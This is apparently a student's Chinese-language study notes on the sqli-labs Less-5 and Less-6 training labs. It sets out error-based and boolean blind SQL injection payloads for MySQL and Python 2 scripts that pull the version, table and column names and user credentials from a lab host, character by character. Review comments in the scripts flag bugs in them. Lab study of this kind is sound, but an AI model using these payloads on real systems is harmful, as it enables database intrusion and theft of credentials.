之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
报错型 SQL 盲注
函数讲解
-
盲注用到的函数
- rand():产生一个不固定的 0~1 随机数列;加了参数之后会变成固定的伪随机数列,如 rand(0)、rand(1)。当使用一个整数参数时,rand 使用该参数作为种子生成一个固定的伪随机数列
- floor():向下取整,例如 floor(2.5) == 2
- count():统计元组的个数
- concat():字符串连接
- extractvalue():有长度限制,最长 32 位
- updatexml():有长度限制,最长 32 位
Less-5 使用脚本爆破注入
Less-6 使用 floor(rand(x)*2) 报错注入
注入方法
下面以 Less-6(基于报错的sql盲注-双引号)为例进行列举
-
布尔型盲注手法,按位爆破
- left()
- ascii()、substr()
- regexp
- ord()、mid()
?id=1'and left((select version() limit 0,1),1)='s'#
-
利用 floor(rand(x)*2) 的执行bug进行报错注入
?id=1" union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a#
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
-
利用 extractvalue() 函数报错注入(有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用)
?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a))))#
?id=1" and extractvalue(1,concat(0x7e,(database())))#
?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#
-
利用 updatexml() 函数报错注入(有长度限制,最长32位)
?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
-
利用 name_const 数据的重复性(低版本可用,mysql 5.0可用,mysql 5.6不可用)
?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
-
利用 double 数值类型超出范围进行报错注入
?id=1" union select (exp(~(select * from(select user())a))),2,3#
未测试成功
-
利用 bigint 溢出进行报错注入(MySQL 5.5.5 及以上版本才会产生这些溢出错误)
基于 bigint 溢出错误的SQL注入( https://www.cnblogs.com/lcamry/articles/5509112.html)
未测试成功
?id=1" union select (!(select * from (select user())x) - ~0),2,3#
下面为句式:
!(select*from(select user())x)-~0
(select(!x-~0)from(select(select user())x)a)
(select!x-~0.from(select(select user())x)a)
select ~0+!(select*from(select user())x)
-
一个句式组合:
(select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a)
遇到无法使用 select * from * 查询的时候,可以使用这个万能句式,代替下面的“你希望的查询语句”
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
?id=1" union select (exp(~(select * from(select user())a))),2,3#
and so on...
Less-5 基于错误的sql盲注-单引号
-
测试
?id=1 正常
?id=1" 正常
?id=1' 报错
下面使用布尔型 SQL 盲注
-
猜数据库的版本
?id=1'and left(version(),1)=4--+
?id=1'and left(version(),1)=5--+
# 结果为 5.0.51a3ubuntu5
脚本运行
# -*- coding: utf-8 -*-
# filename:Less05-1 database_version.py
# Python 2 script (print statements). Boolean-based blind probe of the
# sqli-labs Less-5 endpoint that recovers version() one character at a time.
import hackhttp
import re
def database_version(arg):
    """Recover the target's version() string character by character.

    arg is the base URL up to and including ``?id=``. Every probe appends the
    URL-encoded condition ``1' and mid(version(),i,1)='c'--+`` and treats the
    marker text "You are in" in the response body as "condition true".
    Prints each recovered character and the final string; returns None.
    A position for which no candidate matches is silently skipped, so any
    character outside ``payloads`` (e.g. '-') is dropped from the result.
    """
    print "database_version start test..."
    # Candidate characters tried at every position, in this order.
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
    version=""
    # Positions 1..19 of version(); one GET per (position, candidate), which
    # shows up in the server access log as a long run of near-identical
    # requests differing only in the mid() offset and the compared character.
    for i in range(1,20):
        for j in payloads:
            hh = hackhttp.hackhttp()  # a new client object for every probe
            msg = "1%27and%20mid(version(),{i},1)=%27{j}%27--+".format(i=i,j=j)
            code, head, body, redirect_url, log = hh.http(arg+msg)
            # re.findall returns the list of matches; a non-empty list means
            # the response carried the marker the script uses as "true".
            count = re.findall("You are in",body)
            if 'You are in' in count:
                version+=j
                print "第%s位是%s" % (i,j)
                break  # first matching candidate wins; go to the next position
    print "数据库的版本为: {version}".format(version=version)
if __name__ == '__main__':
    database_version('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜数据库的长度
?id=1'and length(database())=7--+
?id=1'and length(database())=8--+
# 结果为 8
脚本运行
# -*- coding: utf-8 -*-
# filename:Less05-2 database_length.py
# Python 2 script. Boolean-based blind probe of the sqli-labs Less-5 endpoint
# for the value of length(database()).
import hackhttp
import re
def database_length(arg):
    """Find length(database()) on the target by testing the values 1..19.

    arg is the base URL up to and including ``?id=``. Each probe appends the
    URL-encoded condition ``1' and length(database())=j--+`` and treats the
    marker text "You are in" in the response body as "condition true".
    Prints the first matching length; returns None. If no value in 1..19
    matches, ``length`` stays "" and the final line prints an empty value.
    """
    print "database_length start test..."
    length=""
    for j in range(1,20):
        hh = hackhttp.hackhttp()  # a new client object for every probe
        msg = "1%27and%20length(database())={j}--+".format(j=j)
        code, head, body, redirect_url, log = hh.http(arg+msg)
        # Non-empty match list <=> the injected condition held on the server.
        count = re.findall("You are in",body)
        if 'You are in' in count:
            length=j
            break  # the first true value is the answer
    print "数据库的长度为: {length}".format(length=length)
if __name__ == '__main__':
    database_length('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜数据库名
?id=1' and mid(database(),1,1)="a"--+
?id=1' and mid(database(),1,1)="b"--+
# 结果为 security
脚本运行
# -*- coding: utf-8 -*-
# filename:Less05-3 database_name.py
# Python 2 script. Boolean-based blind probe of the sqli-labs Less-5 endpoint
# that recovers database() one character at a time.
import hackhttp
import re
def database_name(arg):
    """Recover the target's database() name character by character.

    arg is the base URL up to and including ``?id=``. Every probe appends the
    URL-encoded condition ``1' and mid(database(),i,1)='c'--+`` and treats the
    marker text "You are in" in the response body as "condition true".
    Prints each recovered character and the final name; returns None.
    Positions with no matching candidate are silently skipped.
    """
    print "database_name start test..."
    # Candidate characters tried at every position, in this order.
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
    name=""
    # Positions 1..19; one GET per (position, candidate).
    for i in range(1,20):
        for j in payloads:
            hh = hackhttp.hackhttp()  # a new client object for every probe
            msg = "1%27and%20mid(database(),{i},1)=%27{j}%27--+".format(i=i,j=j)
            code, head, body, redirect_url, log = hh.http(arg+msg)
            # Non-empty match list <=> the injected condition held on the server.
            count = re.findall("You are in",body)
            if 'You are in' in count:
                name+=j
                print "第%s位是%s" % (i,j)
                break  # first matching candidate wins; go to the next position
    # NOTE(review): the label says 版本 (version) but the value printed is the
    # database name; the wording is a copy-paste leftover from Less05-1.
    print "数据库的版本为: {name}".format(name=name)
if __name__ == '__main__':
    database_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜表名
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=80--+
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=81--+
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=80--+
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=80--+
结果为 emails, users
运行脚本
# -*- coding: utf-8 -*-
# filename:Less05-4 table_name.py
# Python 2 script. Boolean-based blind probe of the sqli-labs Less-5 endpoint
# that recovers table names of the 'security' schema by ASCII code.
import hackhttp
import re
def table_name(arg):
    """Recover up to 10 table names of the target schema, one byte at a time.

    arg is the base URL up to and including ``?id=``. For table index k
    (``limit k,1``), position i and ASCII code j the probe appends the
    URL-encoded condition
    ``1' and ascii(substr((select table_name ... where table_schema=0x7365637572697479 limit k,1),i,1))=j--+``
    (0x7365637572697479 is the hex spelling of "security") and treats the
    marker text "You are in" in the response body as "condition true".
    Prints each recovered byte and the final space-separated names; returns
    None. Only positions 1..9 are probed, so longer names are truncated, and
    a table index with no row just contributes a separator.
    """
    print "table_name start test..."
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')  # unused in this script
    # Local string; shadows the function name inside the body (harmless here).
    table_name=""
    database_name=""  # unused; only referenced in the commented-out line below
    for k in range(10):
        for i in range(1,10):
            # range(65,122) covers ASCII 65..121: 'A'..'Z', the six symbols
            # 91..96, and 'a'..'y' -- 'z' (122) is never tested.
            for j in range(65,122):
                hh = hackhttp.hackhttp()  # a new client object for every probe
                msg = "1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
                code, head, body, redirect_url, log = hh.http(arg+msg)
                # Non-empty match list <=> the injected condition held on the server.
                count = re.findall("You are in",body)
                if 'You are in' in count:
                    table_name+=chr(j)
                    #database_name+=str(k+1)
                    print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break  # first matching code wins; go to the next position
        table_name+=" "  # separator between consecutive table names
    print "security 数据库的表名为: {table_name}".format(table_name=table_name)
if __name__ == '__main__':
    table_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜列名
?id=1'and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^pass' limit 0,1)--+
?id=1'and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1))>65--+
?id=1'and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1))>65--+
结果为 id username password
执行脚本
# -*- coding: utf-8 -*-
# filename:Less05-5 column_name.py
# Python 2 script. Boolean-based blind probe of the sqli-labs Less-5 endpoint
# that recovers column names of the 'users' table by ASCII code.
import hackhttp
import re
def column_name(arg):
    """Recover up to 10 column names of the target table, one byte at a time.

    arg is the base URL up to and including ``?id=``. For column index k
    (``limit k,1``), position i and ASCII code j the probe appends the
    URL-encoded condition
    ``1' and ascii(substr((select column_name ... where table_name=0x7573657273 limit k,1),i,1))=j--+``
    (0x7573657273 is the hex spelling of "users") and treats the marker text
    "You are in" in the response body as "condition true".
    Prints each recovered byte and the final space-separated names; returns
    None. Positions 1..14 are probed; a column index with no row only
    contributes a separator.
    """
    print "column_name start test..."
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')  # unused in this script
    # Local string; shadows the function name inside the body (harmless here).
    column_name=""
    for k in range(10):
        for i in range(1,15):
            # range(65,122) covers ASCII 65..121; 'z' (122) is never tested.
            for j in range(65,122):
                hh = hackhttp.hackhttp()  # a new client object for every probe
                msg = "1%27and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
                code, head, body, redirect_url, log = hh.http(arg+msg)
                # Non-empty match list <=> the injected condition held on the server.
                count = re.findall("You are in",body)
                if 'You are in' in count:
                    column_name+=chr(j)
                    print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break  # first matching code wins; go to the next position
        column_name+=" "  # separator between consecutive column names
    print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name)
if __name__ == '__main__':
    column_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
-
猜数据
?id=1' and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id LIMIT 0,1),1,1))=68--+
?id=1'and ascii(substr((select username from security.users limit 0,1),1,1))=68--+
执行脚本
# -*- coding: utf-8 -*-
# filename:Less05-5 data.py
# Python 2 script. Boolean-based blind probe of the sqli-labs Less-5 endpoint
# that reads username/password rows of security.users by ASCII code.
import hackhttp
import re
def data(arg):
    """Recover up to 14 rows of security.users (username and password) byte by byte.

    arg is the base URL up to and including ``?id=``. For row k (``limit k,1``),
    position i and ASCII code j two probes are sent, one for username and one
    for password, each appending the URL-encoded condition
    ``1' and ascii(substr((select <col> from security.users limit k,1),i,1))=j--+``;
    the marker text "You are in" in a response body is taken as "condition true".
    Prints each recovered byte and the two final space-separated strings;
    returns None. Positions 1..14 are probed; range(48,122) covers ASCII
    48..121 ('0'..'9', 'A'..'Z', symbols, 'a'..'y'), so 'z' is never tested.

    NOTE(review): both ``re.findall`` calls below run on the same ``body``,
    which at that point holds the response to the *password* probe (the
    username response was overwritten by the second ``hh.http`` call). The
    username branch is therefore evaluated against the password response,
    and ``break`` only fires from the password branch.
    """
    print "data start test..."
    payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')  # unused in this script
    username=""
    password=""
    for k in range(14):
        for i in range(1,15):
            for j in range(48,122):
                hh = hackhttp.hackhttp()  # a new client object for every probe pair
                username_msg = "1%27and%20ascii(substr((select%20username%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
                password_msg = "1%27and%20ascii(substr((select%20password%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
                # Two requests per candidate; only the second response survives in ``body``.
                code, head, body, redirect_url, log = hh.http(arg+username_msg)
                code, head, body, redirect_url, log = hh.http(arg+password_msg)
                username_count = re.findall("You are in",body)
                password_count = re.findall("You are in",body)
                if 'You are in' in username_count:
                    username+=chr(j)
                    print "username第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
                if 'You are in' in password_count:
                    password+=chr(j)
                    print "password第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
                    break  # first matching code wins; go to the next position
        username+=" "  # separators between consecutive rows
        password+=" "
    print "security 数据库的 user 表的username为: {username}".format(username=username)
    print "security 数据库的 user 表的password为: {password}".format(password=password)
if __name__ == '__main__':
    data('http://10.10.10.137/sqli-labs/Less-5/?id=')
Less-6 基于错误的sql盲注-双引号
floor(rand(x)*2) - SQL报错型盲注教程(原理全剖析( https://blog.csdn.net/qq_35544379/article/details/77453019 ))
牛人推论:对于一个整数x,对于floor(rand(x)*2)产生的序列,如果在未出现“0011”或“1100”序列前出现“0010“或”1101”,那么该floor(rand(x)*2)产生的序列可用于报错型sql盲注
-
测试
?id=1 正常
?id=1' 正常
?id=1" 报错
下面使用基于报错的 SQL 盲注
公式:
?id=1' union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a--+
例如:
?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a--+
?id=1" union select 1,count(*),concat(@@version,floor(rand(0)*2))a from information_schema.tables group by a--+
?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a--+
有的时候 union 联合查询无法使用,则可以使用 and
?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
-
猜数据库
?id=1" and (select 1 from(select count(*),concat(table_schema,floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a--+
-
查表的个数
?id=1" and (select 1 from(select count(*),concat((select count(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x20,floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x20,floor(rand(0)*2))a from information_schema.columns group by a--+
-
查表名
?id=1" and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+
-
查列数
?id=1" and (select 1 from(select count(*),concat((select count(column_name) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+
-
列名
?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+
?id=1" union Select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+
-
查数据
?id=1" and (select 1 from(select count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
?id=1" union select 1,count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a--+